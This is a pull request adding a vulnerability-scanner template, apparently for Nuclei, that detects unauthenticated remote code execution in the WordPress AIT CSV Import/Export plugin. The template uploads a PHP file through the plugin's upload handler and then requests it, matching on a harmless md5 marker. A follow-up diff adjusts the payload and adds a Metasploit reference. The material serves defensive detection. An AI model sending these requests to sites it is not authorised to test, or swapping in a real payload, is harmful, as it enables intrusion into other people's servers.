### PR TITLE
Create ait-csv-import-export-rce.yaml

### DIFF
--- a/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
+++ b/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -1,0 +1,47 @@
+id: ait-csv-import-export-rce
+
+info:
+  name: WordPress AIT CSV Import Export - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content.
+  reference:
+    - https://wpscan.com/vulnerability/10471
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 9.8
+    cwe-id: CWE-434
+  tags: wordpress,wp-plugin,rce,upload,unauth,ait-csv
+
+requests:
+  - raw:
+      - |
+        POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=------------------------ab360007dbae2de8
+
+        --------------------------ab360007dbae2de8
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
+        Content-Type: application/octet-stream
+
+        <?php echo md5('ait-csv-import-export-rce');?>
+
+        --------------------------ab360007dbae2de8--
+
+      - |
+        GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "fe394b60dc324c3bac3060d600ad4349"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/22

--- a/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
+++ b/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -4,14 +4,16 @@ info:
   name: WordPress AIT CSV Import Export - Unauthenticated Remote Code Execution
   author: gy741
   severity: critical
-  description: The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content.
+  description: |
+    The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content.
   reference:
     - https://wpscan.com/vulnerability/10471
+    - https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_ait_csv_rce.rb
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 9.8
     cwe-id: CWE-434
-  tags: wordpress,wp-plugin,rce,upload,unauth,ait-csv
+  tags: wordpress,wp-plugin,rce,upload,unauth,ait-csv,wp
 
 requests:
   - raw:
@@ -25,7 +27,7 @@ requests:
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5('ait-csv-import-export-rce');?>
+        sep=;<?php echo md5('ait-csv-import-export-rce');?>
 
         --------------------------ab360007dbae2de8--
 


### PR DESCRIPTION
### Template / PR Information

Hello,

Added ait-csv-import-export-rce.yaml
 
```
The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code.  The upload-handler does not require authentication, nor validates the uploaded content.
```

- References: https://wpscan.com/vulnerability/10471

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO
